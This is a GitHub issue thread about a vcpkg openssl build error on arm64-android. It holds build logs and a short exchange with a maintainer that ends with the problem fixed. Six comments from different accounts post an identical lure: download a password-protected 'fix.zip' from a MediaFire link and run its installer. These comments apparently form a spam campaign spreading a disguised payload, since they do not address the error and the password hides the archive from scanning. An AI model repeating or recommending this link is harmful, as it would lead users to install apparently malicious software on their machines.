### ISSUE TITLE
[openssl] Build error on arm64-android

### ISSUE THREAD

**Issue by jmu201621143028** [microsoft/vcpkg#40640] opened 2024-08-26 06:45 UTC
Package: openssl:arm64-android@3.3.1#1

**Host Environment**

- Host: x64-windows
- Compiler: Clang 12.0.9
-    vcpkg-tool version: 2024-08-01-fd884a0d390d12783076341bd43d77c3a6a15658
    vcpkg-scripts version: 350898514 2024-08-23 (3 days ago)

**To Reproduce**

`vcpkg install openssl`

**Failure logs**

```
-- Using cached openssl-openssl-openssl-3.3.1.tar.gz.
-- Cleaning sources at D:/vcpkg/buildtrees/openssl/src/nssl-3.3.1-1ae1909b44.clean. Use --editable to skip cleaning for the packages you specify.
-- Extracting source D:/vcpkg/downloads/openssl-openssl-openssl-3.3.1.tar.gz
-- Applying patch cmake-config.patch
-- Applying patch command-line-length.patch
-- Applying patch script-prefix.patch
-- Applying patch asm-armcap.patch
-- Applying patch windows/install-layout.patch
-- Applying patch windows/install-pdbs.patch
-- Applying patch unix/android-cc.patch
-- Applying patch unix/move-openssldir.patch
-- Applying patch unix/no-empty-dirs.patch
-- Applying patch unix/no-static-libs-for-shared.patch
-- Using source at D:/vcpkg/buildtrees/openssl/src/nssl-3.3.1-1ae1909b44.clean
-- Using cached msys2-make-4.4.1-2-x86_64.pkg.tar.zst.
-- Using cached msys2-perl-5.38.2-2-x86_64.pkg.tar.zst.
-- Using cached msys2-bash-5.2.026-1-x86_64.pkg.tar.zst.
-- Using cached msys2-coreutils-8.32-5-x86_64.pkg.tar.zst.
-- Using cached msys2-file-5.45-1-x86_64.pkg.tar.zst.
-- Using cached msys2-gawk-5.3.0-1-x86_64.pkg.tar.zst.
-- Using cached msys2-grep-1~3.0-6-x86_64.pkg.tar.zst.
-- Using cached msys2-gzip-1.13-1-x86_64.pkg.tar.zst.
-- Using cached msys2-diffutils-3.10-1-x86_64.pkg.tar.zst.
-- Using cached msys2-pkgconf-2.1.1-1-x86_64.pkg.tar.zst.
-- Using cached msys2-sed-4.9-1-x86_64.pkg.tar.zst.
-- Using cached msys2-msys2-runtime-3.5.3-3-x86_64.pkg.tar.zst.
-- Using cached msys2-libintl-0.22.4-1-x86_64.pkg.tar.zst.
-- Using cached msys2-libxcrypt-4.4.36-1-x86_64.pkg.tar.zst.
-- Using cached msys2-libiconv-1.17-1-x86_64.pkg.tar.zst.
-- Using cached msys2-gmp-6.3.0-1-x86_64.pkg.tar.zst.
-- Using cached msys2-gcc-libs-13.3.0-1-x86_64.pkg.tar.zst.
-- Using cached msys2-libbz2-1.0.8-4-x86_64.pkg.tar.zst.
-- Using cached msys2-liblzma-5.6.2-1-x86_64.pkg.tar.zst.
-- Using cached msys2-libzstd-1.5.6-1-x86_64.pkg.tar.zst.
-- Using cached msys2-zlib-1.3.1-1-x86_64.pkg.tar.zst.
-- Using cached msys2-libreadline-8.2.010-1-x86_64.pkg.tar.zst.
-- Using cached msys2-mpfr-4.2.1-1-x86_64.pkg.tar.zst.
-- Using cached msys2-libpcre-8.45-4-x86_64.pkg.tar.zst.
-- Using cached msys2-ncurses-6.5-1-x86_64.pkg.tar.zst.
-- Using msys root at D:/vcpkg/downloads/tools/msys2/dd1a9f876ba4a3f9
CMake Error at ports/openssl/unix/portfile.cmake:33 (vcpkg_cmake_get_vars):
  Unknown CMake command "vcpkg_cmake_get_vars".
Call Stack (most recent call first):
  ports/openssl/portfile.cmake:72 (include)
  scripts/ports.cmake:192 (include)



```

**Comment by llowvxe** [comment] 2024-08-26 06:46
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment] 2024-08-26 06:46
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jmu201621143028** [comment] 2024-08-26 06:48
my command:
```shell
.\vcpkg.exe install --triplet arm64-android openssl --debug
```

**Comment by Qsgz2023ji5ban** [comment] 2024-08-26 06:50
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MoonShadowIllusion** [comment] 2024-08-26 06:50
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment] 2024-08-26 06:50
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment] 2024-08-26 06:51
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LilyWangLL** [comment] 2024-08-26 08:14
Duplicate of #34294, please try the solution from https://github.com/microsoft/vcpkg/issues/34294#issuecomment-1750013461.

**Comment by jmu201621143028** [comment] 2024-08-26 08:22
i see this issue, and i try this solution. but it don't work. 
i think my version is the latest.
```shell
vcpkg-tool version: 2024-08-01-fd884a0d390d12783076341bd43d77c3a6a15658
vcpkg-scripts version: https://github.com/microsoft/vcpkg/commit/3508985146f1b1d248c67ead13f8f54be5b4f5da 2024-08-23 (3 days ago)
```

**Comment by LilyWangLL** [comment] 2024-08-26 08:28
Did you run command `git pull` and `.\bootstrap-vcpkg.bat`?

**Comment by jmu201621143028** [comment] 2024-08-26 08:30
sure

**Comment by LilyWangLL** [comment] 2024-08-26 08:39
If you clone a new vcpkg, will this issue reoccur?

**Comment by jmu201621143028** [comment] 2024-08-26 08:58
this issue is fixed. thanks.

**Closed** 2024-08-26 09:30 UTC
Labels: category:question
